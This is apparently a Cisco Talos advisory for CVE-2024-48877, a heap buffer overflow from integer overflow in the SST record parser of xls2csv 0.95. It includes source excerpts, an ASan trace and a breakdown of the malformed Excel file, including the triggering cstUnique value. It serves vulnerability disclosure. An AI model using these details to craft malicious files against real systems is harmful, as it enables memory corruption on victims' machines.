CVE-2024-48877
A memory corruption vulnerability exists in the Shared String Table Record Parser implementation in xls2csv utility version 0.95. A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
xls2csv 0.95
xls2csv - http://wagner.pp.ru/~vitus/software/catdoc/
8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-680 - Integer Overflow to Buffer Overflow
The xls2csv command-line utility is used by several filesystem indexers in order to extract the textual content from a Microsoft Excel document. The purpose of this is to enable searching through the contents of office documents that are stored on a filesystem.
The xls2csv
program is an open-source application that comes with the catdoc
suite of command-line utilities. These utilities are designed to extract plaintext from the contents of various Microsoft Office documents. These programs support file formats from Microsoft Word, Excel, and Powerpoint. They are used internally by several filesystem indexers such as KDE’s Baloo in order to provide full text search for the contents of documents to the user.
The xls2csv
application is responsible for extracting plaintext from Microsoft Excel documents. At [1], the binary will open up a handle to the document that is to be parsed and then process its header using the call to ole_init
at [2]. After processing the header, a loop will be entered to iterate through each directory entry in the format. If the directory entry has the name “Book” or “Workbook”, the do_table
function at [3] will be used to parse its contents.
src/xls2csv.c:40-180
char *input_buffer, *output_buffer;
int main(int argc, char *argv[])
{
...
for (i=optind;i<argc;i++) {
filename = argv[i];
input=fopen(filename,"rb"); // [1] open up handle to document
if (!input) {
perror(filename);
exit(1);
}
if ((new_file=ole_init(input, NULL, 0)) != NULL) { // [2] read the OLE compound document header
set_ole_func();
while((ole_file=ole_readdir(new_file)) != NULL) { // [2] traverse each directory entry
int res=ole_open(ole_file);
...
if (res >= 0) {
if (strcasecmp(((oleEntry*)ole_file)->name , "Workbook") == 0
|| strcasecmp(((oleEntry*)ole_file)->name,"Book") == 0) {
do_table(ole_file,filename); // [3] process the excel "Workbook" stream
}
}
ole_close(ole_file);
}
set_std_func();
...
return 0;
}
The following function is the implementation of do_table
. This function is used to read each individual record within the stream and process them. At [4] and [5], the function will read the 16-bit record type and length from the stream. Once this information has been read, both fields will be passed to the process_item
function call at [6].
src/xlsparse.c:35-124
void do_table(FILE *input,char *filename) {
long rectype;
long reclen,build_year=0,build_rel=0,offset=0;
int eof_flag=0;
int itemsread=1;
date_shift=25569.0; /* Windows 1900 date system */
CleanUpFormatIdxUsed();
...
while(itemsread){
unsigned char buffer[2];
...
rectype=getshort(buffer,0); // [4] read 16-bit record type
itemsread = catdoc_read(buffer, 2, 1, input);
if(itemsread == 0)
break;
reclen=getshort(buffer,0); // [5] read 16-bit record length
if (reclen && reclen <MAX_MS_RECSIZE &&reclen >0){
itemsread = catdoc_read(rec, 1, reclen, input);
rec[reclen] = '\0';
}
...
process_item(rectype,reclen,rec); // [6] process the record
...
}
return;
}
The process_item
function will use the record type and length to parse each individual record within the directory stream. The two record types that are associated with this vulnerability are the “SST” and “CONTINUE” records. At [7], the record length will be used to allocate a buffer for the “SST” record, and then read the record’s contents into it. At [8], the record length will be used to resize the current buffer for the SST and then read the contents of the “CONTINUE” record into it. Once the process_item
function encounters a record type that is not a “CONTINUE” record, the parse_sst
function at [9] will be used to process the data read from the stream.
src/xlsparse.c:137-416
void process_item (int rectype, int reclen, unsigned char *rec) {
if (rectype != CONTINUE && prev_rectype == SST) {
...
parse_sst(sstBuffer,sstBytes); // [9] Parse the collected SST contents
}
switch (rectype) {
...
case SST: {
/* Just copy SST into buffer, and wait until we get
* all CONTINUE records
*/
...
/* If exists first SST entry, then just drop it and start new*/
if (sstBuffer != NULL)
free(sstBuffer);
if (sst != NULL)
free(sst);
...
sstBuffer=(unsigned char*)malloc(reclen); // [7] allocate memory for SST record
sstBytes = reclen;
...
memcpy(sstBuffer,rec,reclen); // [7] write contents of SST to allocation
break;
}
case CONTINUE: {
if (prev_rectype != SST) {
return; /* to avoid changing of prev_rectype;*/
}
sstBuffer=realloc(sstBuffer,sstBytes+reclen); // [8] resize SST buffer for CONTINUE record
...
memcpy(sstBuffer+sstBytes,rec,reclen); // [8] write contents of CONTINUE record
sstBytes+=reclen;
return;
}
...
}
When parsing the linked contents of the combined “SST” and “CONTINUE” records, the following parse_sst
function will be used. This function will first read a 32-bit integer from the beginning of the buffer that was populated. This 32-bit size will then be used to allocate an array of pointers at [11]. On 32-bit platforms, this can result in an integer overflow. Immediately afterwards at [12], a loop will be entered in order to populate the recently allocated array. Due to the integer overflow, the array can result in being undersized. At which point this loop will write outside the bounds of the undersized array.
src/xlsparse.c:758-779
void parse_sst(unsigned char *sstbuf,int bufsize) {
int i; /* index into sst */
unsigned char *curString; /* pointer into unparsed buffer*/
unsigned char *barrier=(unsigned char *)sstbuf+bufsize; /*pointer to end of buffer*/
unsigned char **parsedString;/*pointer into parsed array*/
sstsize = getlong(sstbuf+4,0); // [10] read 32-bit integer
sst=(unsigned char **)malloc(sstsize*sizeof(unsigned char *)); // [11] allocate memory for string references
...
memset(sst,0,sstsize*sizeof(char *));
for (i=0,parsedString=sst,curString=sstbuf+8; // [12] loop to read each string from SST
i<sstsize && curString<barrier; i++,parsedString++) {
...
*parsedString = copy_unicode_string(&curString); // [13] assign reference to string into allocation
}
...
}
=================================================================
==446418==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5000ff0 at pc 0x0804ce54 bp 0xff8b4c38 sp 0xff8b4c2c
WRITE of size 4 at 0xf5000ff0 thread T0
#0 0x804ce53 in parse_sst /.../catdoc/src/xlsparse.c:775
#1 0x804d55f in process_item /.../catdoc/src/xlsparse.c:142
#2 0x804f1a1 in do_table /.../catdoc/src/xlsparse.c:116
#3 0x804a0bb in main /.../catdoc/src/xls2csv.c:167
#4 0xf75e6d42 in __libc_start_call_main (/lib/libc.so.6+0x2d42) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
#5 0xf75e6e07 in __libc_start_main@@GLIBC_2.34 (/lib/libc.so.6+0x2e07) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
#6 0x804a887 in _start (/.../catdoc/src/xls2csv+0x804a887) (BuildId: b35845f47ccf2f2aec66798eb0192a603c879079)
0xf5000ff1 is located 0 bytes after 1-byte region [0xf5000ff0,0xf5000ff1)
allocated by thread T0 here:
#0 0xf7989f0b in calloc (/lib/libasan.so.8+0xcef0b) (BuildId: 4750f09fdf739c5f6973660b631b7f5960de4d51)
#1 0x804cd46 in parse_sst /.../catdoc/src/xlsparse.c:765
#2 0x804d55f in process_item /.../catdoc/src/xlsparse.c:142
#3 0x804f1a1 in do_table /.../catdoc/src/xlsparse.c:116
#4 0x804a0bb in main /.../catdoc/src/xls2csv.c:167
#5 0xf75e6d42 in __libc_start_call_main (/lib/libc.so.6+0x2d42) (BuildId: 5846c8c4629a038f4d1a47fd0ffd369dedf95400)
SUMMARY: AddressSanitizer: heap-buffer-overflow /.../catdoc/src/xlsparse.c:775 in parse_sst
Shadow bytes around the buggy address:
0xf5000d00: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 02 fa
0xf5000d80: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 02 fa
0xf5000e00: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 02 fa
0xf5000e80: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 03 fa
0xf5000f00: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 02 fa
=>0xf5000f80: fa fa fa fa fa fa fa fa fa fa 01 fa fa fa[01]fa
0xf5001000: fa fa fd fa fa fa 01 fa fa fa 01 fa fa fa 04 fa
0xf5001080: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 04 fa
0xf5001100: fa fa 02 fa fa fa 02 fa fa fa 03 fa fa fa 03 fa
0xf5001180: fa fa 02 fa fa fa 02 fa fa fa 02 fa fa fa 05 fa
0xf5001200: fa fa 03 fa fa fa 02 fa fa fa 03 fa fa fa 03 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==446418==ABORTING
The included proof-of-concept depends on Python3 and is used to generate a Microsoft Excel document. To use it, pass the desired filename as a parameter. Once the process has completed, the generated file can be used as a parameter to the xls2csv
binary.
$ python3 poc.py3.zip /path/to/filename.xls
...
$ src/xls2csv /path/to/filename.xls
The “Workbook” stream in the generated document has 1 worksheet that is composed of 6 records.
>>> store
<class excel.File> 'unnamed_7fe164ba77d0' {unnamed=True,overcommit=True,size=8288} excel.BiffSubStream[1]
[0] excel.BiffSubStream[0] : 0(version=8) : 6 records : excel.BOF5[0:+14] "\x09\x08\x08\x00\x00\x00\x00\x00\x00" ... excel.EOF[2054:+4] "\x0a\x00\x00\x00"
>>> store[0]
<class excel.BiffSubStream> '0' {overcommit=True,document-type='0x0000 (0)',document-version='0.0',document-year=0,document-build=0} excel.RecordGeneral[6]
[0] excel.BiffSubStream[0] : excel.BOF5[0809] : vers=0x0000 (0) rupBuild=0x0000 (0) rupYear=0x0000 (0) dt=0x0000 (0) flags=(0xffffffff00080204,64) :> reserved2=1048575 verLastXLSaved=15 verLowestBiff=255 reserved1 fOOM fBeta
[c] excel.BiffSubStream[1] : 2 * excel.BIFF8.unknown<0204>[0204] : \xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00
[24] excel.BiffSubStream[3] : excel.SST[00fc] : "\x01\x00\x00\x00\x00\x00\x00\x40"
[30] *excel.BiffSubStream[4] : excel.Continue[003c] : ...
[2054] excel.BiffSubStream[5] : excel.EOF[000a] : ...
The first record in this worksheet must be a BOF
record type of type 0x0809.
>>> store[0][0]
<class excel.RecordGeneral> '0'
[0] <instance excel.RecordGeneral.Header 'header'> type=0x0809 length=0x8(8)
[4] <instance excel.BOF5 'data'> vers=0x0000 (0) rupBuild=0x0000 (0) rupYear=0x0000 (0) dt=0x0000 (0) flags=(0xffffffff00080204,64) :> reserved2=1048575 verLastXLSaved=15 verLowestBiff=255 reserved1 fOOM fBeta
[14] <instance dynamic.block(0) 'extra'> (0) ""
The third record is the SST
record of type 0x00fc that is directly responsible for this vulnerability.
>>> store[0][3]
<class excel.RecordGeneral> '3'
[24] <instance excel.RecordGeneral.Header 'header'> type=0x00fc length=0x8(8)
[28] <instance excel.SST 'data'> "\x01\x00\x00\x00\x00\x00\x00\x40"
[30] <instance dynamic.block(0) 'extra'> (0) ""
In this record, the 32-bit “cstUnique” field is used for allocating the array of pointers. If the product of this integer and the size of a pointer is larger than 32-bits, then this vulnerability is being triggered.
>>> store[0][3]['data']
<class excel.SST> 'data'
[28] <instance office.sint4 'cstTotal'> +0x00000001 (1)
[2c] <instance office.sint4 'cstUnique'> +0x40000000 (1073741824)
[30] <instance dynamic.blockarray(excel.XLUnicodeRichExtendedString, 0) 'rgb'> excel.XLUnicodeRichExtendedString[0] ""
2025-01-07 - Initial Vendor Contact
2025-01-14 - Initial Vendor Contact
2025-01-16 - Vendor Disclosure
2025-06-02 - Public Release
Discovered by a member of Cisco Talos.